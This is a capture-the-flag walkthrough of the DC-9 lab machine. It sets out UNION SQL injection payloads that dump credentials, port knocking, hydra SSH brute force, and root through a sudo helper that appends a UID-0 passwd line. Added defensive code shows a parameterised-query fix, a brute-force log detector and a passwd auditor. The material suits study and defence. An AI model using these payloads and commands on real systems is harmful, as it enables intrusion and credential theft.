Information gathering:
root@kali:/opt/test# nmap -A -v 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:51 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating ARP Ping Scan at 21:51
Scanning 192.168.76.137 [1 port]
Completed ARP Ping Scan at 21:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:51
Completed Parallel DNS resolution of 1 host. at 21:52, 13.01s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.76.137 [1000 ports]
Discovered open port 80/tcp on 192.168.76.137
Completed SYN Stealth Scan at 21:52, 0.14s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 1 service on 192.168.76.137
Completed Service scan at 21:52, 6.04s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.76.137
NSE: Script scanning 192.168.76.137.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.22s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.01s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.76.137
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:79:DB:F0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 14.277 days (since Mon Sep 7 15:13:16 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Visiting the web service on port 80, the search page is vulnerable to SQL injection. A UNION query was used to determine the number of columns, which is 6:
Read the database name:
search=Mary'%20union%20SELECT%20database(),2,3,4,5,6;%20--%20
Database name obtained: staff
Read the table names in that database:
search=Mary'%20union%20SELECT%20TABLE_NAME,2,3,4,5,6%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA%3ddatabase();%20--%20
Table name obtained:
Read the column names:
search=Mary'%20union%20SELECT%20column_name,2,3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name='Users';%20--%20
Read the ID, username and password from the Users table:
search=Mary'%20union%20SELECT%20UserID,2,3,Username,Password,6%20FROM%20Users;%20--%20
Username and password obtained: admin: 856f5de590ef37314e7c3bdf6f8a66dc
Online decryption gives the plaintext: transorbital1
Logging in with that username, there is a local file inclusion under the manage path:
Attempts to include log files failed, so a shell could not be obtained through log inclusion. The SQL injection above also exposes a second database, so dump its contents:
Read the database (schema) names:
search=Mary' union select schema_name,2,3,4,5,6 from information_schema.schemata;--
Read the tables in the users database:
search=Mary' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema='users';--
Read the column names of UserDetails:
search=Mary' union select column_name,2,3,4,5,6 from information_schema.columns where table_schema='users' and table_name='UserDetails';--
Read the username and password fields:
search=Mary' union select 1,2,3,username,password,6 from users.UserDetails;--
Split the usernames and passwords into two files; the username-to-password mapping is as follows:
user       password
marym      3kfs86sfd
julied     468sfdfsd2
fredf      4sfd87sfd1
barneyr    RocksOff
tomc       TC&TheBoyz
jerrym     B8m#48sd
wilmaf     Pebbles
bettyr     BamBam01
chandlerb  UrAG0D!
joeyt      Passw0rd
rachelg    yN72#dsd
rossg      ILoveRachel
monicag    3248dsds7s
phoebeb    smellycats
scoots     YR3BVxxxw87
janitor    Ilovepeepee
janitor2   Hawaii-Five-0
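An added example, not part of the original write-up, showing the defect behind every payload above (both the first set against the staff database and the dump of users.UserDetails rely on the same thing): the search term is pasted into the SQL text, so a quote ends the string and a UNION appends a second SELECT that reads from whatever tables the application's database account can see. It uses an in-memory SQLite database as a stand-in for the target's MySQL; the table layout and the staff rows are assumed, while the usernames and passwords are the ones dumped above. The same UNION payload is run through the vulnerable query and through a parameterised one.

```python
import sqlite3

# Constructed stand-in for the two databases seen in the write-up: the staff
# table the search page queries (six columns, matching the column count found
# with UNION) and a credential table standing in for users.UserDetails.
# The staff rows are made up; the credentials are the ones dumped above.
SCHEMA = """
CREATE TABLE StaffDetails (
    id INTEGER, firstname TEXT, lastname TEXT, position TEXT, phone TEXT, email TEXT);
CREATE TABLE UserDetails (id INTEGER, username TEXT, password TEXT);
INSERT INTO StaffDetails VALUES (1, 'Mary', 'Moe', 'Receptionist', '555-0101', 'mary@example.com');
INSERT INTO StaffDetails VALUES (2, 'Julie', 'Dooley', 'Manager', '555-0102', 'julie@example.com');
INSERT INTO UserDetails VALUES (1, 'marym', '3kfs86sfd');
INSERT INTO UserDetails VALUES (2, 'julied', '468sfdfsd2');
"""

# Same shape as the last payload in the write-up (schema qualifier dropped for
# SQLite, and no ';' so the injected text stays a single statement here).
UNION_PAYLOAD = "Mary' union select 1,2,3,username,password,6 from UserDetails-- "


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """The bug: the search term becomes part of the SQL text."""
    sql = ("SELECT id, firstname, lastname, position, phone, email "
           "FROM StaffDetails WHERE firstname = '%s'" % term)
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: a bound parameter is always data, never SQL."""
    sql = ("SELECT id, firstname, lastname, position, phone, email "
           "FROM StaffDetails WHERE firstname = ?")
    return conn.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    # Vulnerable: Mary's row plus one row per credential, smuggled into columns 4 and 5.
    for row in search_vulnerable(conn, UNION_PAYLOAD):
        print("vulnerable:", row)
    # Safe: the whole payload is compared as a first name, so nothing matches.
    print("safe:", search_safe(conn, UNION_PAYLOAD))
```

Parameterisation is the fix for the injection itself; the second database being readable at all is a separate finding, since the web application's database account had no need to read users.UserDetails and a least-privilege grant would have stopped the dump even with the injection present.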
Cross-checking with the /etc/passwd file, every one of these users has an account in passwd, so try brute-forcing with hydra. But access to port 22 is filtered, because the knockd service is in use (https://www.cnblogs.com/bask/p/9159197.html).
The three ports 7469, 8475 and 9842 on the target must be connected to first before the SSH port opens:
root@kali:/opt/test# ssh 192.168.76.137
ssh: connect to host 192.168.76.137 port 22: Connection refused
root@kali:/opt/test# nmap -p7469,8475,9842 -Pn --max-retries=0 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 00:16 CST
Nmap scan report for 192.168.76.137
Host is up (0.00041s latency).

PORT     STATE  SERVICE
7469/tcp closed unknown
8475/tcp closed unknown
9842/tcp closed unknown
MAC Address: 00:0C:29:79:DB:F0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds
root@kali:/opt/test# ssh 192.168.76.137
The authenticity of host '192.168.76.137 (192.168.76.137)' can't be established.
ECDSA key fingerprint is SHA256:o2Ii/WX152zZCRlVrfXpNnX8mvNwYfOWhkMscAr+sMs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.76.137' (ECDSA) to the list of known hosts.
root@192.168.76.137's password:
Now brute-force with hydra using the usernames and passwords collected earlier:
root@kali:/opt/test# hydra -L user.txt -P pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:20:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.76.137   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.76.137   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:21:13
Three username/password pairs are obtained. Logging in with each in turn, none of the three has sudo rights, but janitor's home directory contains a hidden folder:
root@kali:/opt/test# ssh janitor@192.168.76.137
janitor@192.168.76.137's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep 23 10:21 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep 23 10:21 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for janitor:
Sorry, user janitor may not run sudo on dc-9.
janitor@dc-9:~$ more .secrets-for-putin/
*** .secrets-for-putin/: directory ***
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ more passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
Save these passwords to a text file and brute-force again with the earlier username list:
root@kali:/opt/test# cat putin_pass.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHt
root@kali:/opt/test# hydra -L user.txt -P putin_pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:34:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 102 login tries (l:17/p:6), ~7 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: fredf   password: B4-Tru3-001
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:35:09
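An added detection example, not from the write-up, for the two hydra runs above: what they leave in the SSH server's auth.log and a small detector over such lines. The log lines are constructed here (the attacking address 192.0.2.10 is a documentation address, not one from this write-up), in the format of Debian's sshd "Failed password" / "Accepted password" syslog lines. A source is flagged when it fails ten times within a minute or tries three or more distinct usernames, and any Accepted login from a flagged source is recorded, since a success after a burst of failures is the event these runs produce (chandlerb, joeyt, janitor, then fredf). Port knocking only hid the service; once the sequence was known, nothing slowed the 289 attempts down.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Debian sshd lines as written to /var/log/auth.log by rsyslog.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$")


def parse_line(line, year=2020):
    """Return (timestamp, outcome, user, ip) or None for lines we don't care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it.
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("outcome"), m.group("user"), m.group("ip")


def detect_bruteforce(lines, threshold=10, window_seconds=60, min_users=3):
    """Return {ip: finding} for sources that behave like a password-guessing tool."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the sliding window
    total = Counter()             # ip -> all failures
    users = defaultdict(set)      # ip -> usernames tried
    accepted = defaultdict(list)  # ip -> usernames that logged in
    burst = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, outcome, user, ip = parsed
        if outcome == "Accepted":
            accepted[ip].append(user)
            continue
        total[ip] += 1
        users[ip].add(user)
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            burst.add(ip)
    findings = {}
    for ip in users:
        if ip in burst or len(users[ip]) >= min_users:
            findings[ip] = {"failures": total[ip],
                            "usernames": sorted(users[ip]),
                            "accepted": accepted[ip],
                            "burst": ip in burst}
    return findings


def sample_log():
    """Constructed auth.log excerpt: one source spraying the dumped user list at a
    few tries per second, plus one ordinary user who mistypes once and then logs in."""
    attacker, normal = "192.0.2.10", "192.0.2.77"   # documentation addresses
    names = ["marym", "julied", "fredf", "barneyr", "tomc", "jerrym",
             "wilmaf", "bettyr", "chandlerb", "joeyt", "rachelg", "rossg"]
    lines = [
        "Sep 23 00:20:10 dc-9 sshd[900]: Failed password for janitor from %s port 50000 ssh2" % normal,
        "Sep 23 00:20:15 dc-9 sshd[901]: Accepted password for janitor from %s port 50001 ssh2" % normal,
    ]
    for i, name in enumerate(names):
        lines.append("Sep 23 00:20:%02d dc-9 sshd[%d]: Failed password for %s from %s port %d ssh2"
                     % (16 + i // 3, 1000 + i, name, attacker, 41000 + i))
    lines.append("Sep 23 00:20:21 dc-9 sshd[1100]: Accepted password for chandlerb from %s port 41100 ssh2"
                 % attacker)
    return lines


if __name__ == "__main__":
    for ip, finding in detect_bruteforce(sample_log()).items():
        print(ip, finding)
```

The thresholds are deliberately low for the sample; on a real host the same logic feeds fail2ban-style blocking, but the more useful output is the "accepted" list, because that is the account whose password has to be rotated.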
This account has one command it may run as root without a password:
fredf@dc-9:~$ ls -la
total 12
drwx------  3 fredf fredf 4096 Sep 23 10:34 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Sep 23 10:34 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
The test in that path is a stripped ELF binary, so use find to look for other files named test*:
fredf@dc-9:/opt/devstuff/dist/test$ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test*" 2>/dev/null
/opt/devstuff/test.spec
/opt/devstuff/build/test
/opt/devstuff/build/test/test
/opt/devstuff/test.py
/opt/devstuff/dist/test
/opt/devstuff/dist/test/test
A test.py is found in the parent directory (the .spec and build/ tree suggest the ELF was built from it). Its function is to append the contents of file A to the end of file B:
fredf@dc-9:/opt/devstuff$ more test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")

    f.write(output)
    f.close()
So the plan is to write a new root-level user entry into file A and have test append file A to /etc/passwd, which gives privilege escalation.
Generate a SHA-512 crypt hash of the password 123456:
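An added example, not the box's script, of what the test.py above lacks: a containment check on the destination. Nothing in the script limits where root appends the data, so the NOPASSWD rule is equivalent to root. The hardened variant below (the paths and the allowed directory are assumed for the demo) resolves the destination with realpath, requires it to lie under an allowed directory, and opens with O_NOFOLLOW so a symlink swapped in after the check is refused. The right fix is to drop the sudo rule, but if a helper like this has to run as root, this is the minimum it should do.

```python
import os
import tempfile


def safe_append(src, dst, allowed_dir):
    """Append src to dst, but only if dst really lives inside allowed_dir.

    realpath() resolves symlinks before the containment check, and O_NOFOLLOW
    refuses a symlink placed at dst between the check and the open (TOCTOU).
    Returns the number of bytes appended.
    """
    allowed = os.path.realpath(allowed_dir)
    target = os.path.realpath(dst)
    if os.path.commonpath([allowed, target]) != allowed:
        raise PermissionError("refusing to write outside %s: %s" % (allowed, dst))
    with open(src, "rb") as f:
        data = f.read()
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(dst, flags, 0o644)
    try:
        return os.write(fd, data)
    finally:
        os.close(fd)


def run_demo():
    """Exercise three cases in a scratch directory: a file inside the allowed
    tree, a file outside it (standing in for /etc/passwd), and a symlink inside
    the tree that points outside it."""
    with tempfile.TemporaryDirectory() as base:
        allowed = os.path.join(base, "allowed")
        os.mkdir(allowed)
        src = os.path.join(base, "new_user")          # constructed input file
        with open(src, "w") as f:
            f.write("hello\n")
        outside = os.path.join(base, "passwd")        # stand-in for /etc/passwd
        link = os.path.join(allowed, "link")
        os.symlink(outside, link)
        results = {"inside": safe_append(src, os.path.join(allowed, "out.txt"), allowed)}
        for name, dst in (("outside", outside), ("symlink", link)):
            try:
                safe_append(src, dst, allowed)
                results[name] = "written"
            except PermissionError:
                results[name] = "refused"
        return results


if __name__ == "__main__":
    print(run_demo())   # {'inside': 6, 'outside': 'refused', 'symlink': 'refused'}
```

Note that sudo passes the caller's arguments straight through, so any privileged helper must treat argv as attacker-controlled; an allow-list of destinations, not a deny-list of known-sensitive files, is the only check that holds up.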
root@kali:/opt/test# mkpasswd -m sha-512 123456
$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71
Assemble a passwd entry for the new user (UID 0, GID 0, home /root, shell /bin/bash):
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash
Write it to a file:
fredf@dc-9:/opt/devstuff/dist/test$ vi /tmp/new_user
fredf@dc-9:/opt/devstuff/dist/test$ cat /tmp/new_user
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash
Run test through sudo to append the entry to /etc/passwd, then switch to user admin with password 123456:
fredf@dc-9:/opt/devstuff/dist/test$ sudo /opt/devstuff/dist/test/test /tmp/new_user /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test# whoami
root
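An added example, not from the write-up, of the check a defender would run against the result of the step above: parse /etc/passwd and flag any second UID-0 account and any entry that carries its password hash in passwd rather than in shadow, which is exactly what the appended admin line does (su accepts it because a hash in field 2 is honoured directly). The sample passwd text is constructed; the admin line is the one written above, the other entries are made up.

```python
# Constructed /etc/passwd excerpt: ordinary entries plus the line the
# write-up appended (hash copied from the page).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash
"""


def audit_passwd(text):
    """Return a list of (check, username, detail) findings over passwd text.

    Checks: a UID-0 account that is not root, a password field other than the
    'x' shadow marker (a hash or an empty password in passwd itself), a
    duplicate username, and a malformed line.
    """
    findings = []
    seen = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(("malformed", raw.split(":")[0], "line %d has %d fields" % (lineno, len(fields))))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if name in seen:
            findings.append(("duplicate-user", name, "line %d" % lineno))
        seen.add(name)
        if uid == "0" and name != "root":
            findings.append(("uid0", name, "extra UID 0 account with shell %s" % shell))
        if pw == "":
            findings.append(("empty-password", name, "blank password field, login without a password"))
        elif pw != "x":
            findings.append(("hash-in-passwd", name, "password field is not 'x'; shadow is bypassed"))
    return findings


if __name__ == "__main__":
    for check, user, detail in audit_passwd(SAMPLE_PASSWD):
        print("%-15s %-8s %s" % (check, user, detail))
```

Run against the real file (`audit_passwd(open("/etc/passwd").read())`) this is a one-line cron check; a file-integrity tool such as AIDE would also have caught the change, since /etc/passwd is modified only by user management commands and an append outside those is itself the alert.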
Root obtained; read the flag:
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
[ASCII-art banner omitted]

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w . They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever challenge in the DC series.

So long, and thanks for all the fish.
Summary:
1. Manual SQL injection
2. Port knocking to open the SSH port
3. Hydra brute-forcing of usernames and passwords
4. Privilege escalation through a sudo command that needs no root password